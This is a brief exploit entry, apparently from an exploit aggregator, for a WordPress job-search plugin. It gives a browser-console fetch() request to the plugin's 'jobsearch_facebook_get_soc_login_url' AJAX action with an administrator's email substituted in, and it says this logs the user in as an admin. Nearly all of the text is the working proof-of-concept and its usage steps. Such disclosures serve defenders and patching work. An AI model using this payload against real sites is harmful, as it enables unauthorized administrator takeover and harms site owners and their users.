## https://sploitus.com/exploit?id=WPEX-ID:E528E3CD-A45C-4BF7-A37A-101F5C257ACD
Browse to the site, paste the following in your browser's console (replace the email address with that site's administrator's email address):
fetch('/wp-admin/admin-ajax.php', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: new URLSearchParams({
'action': 'jobsearch_facebook_get_soc_login_url',
'user_data': JSON.stringify({
"id": Math.random()*1000,
"email": "user@example.com",
})
})
})
.then(response => response.text())
.then(data => console.log(data))
.catch(error => console.error('Error:', error));
Then access /wp-admin, and notice you're logged-in as an admin.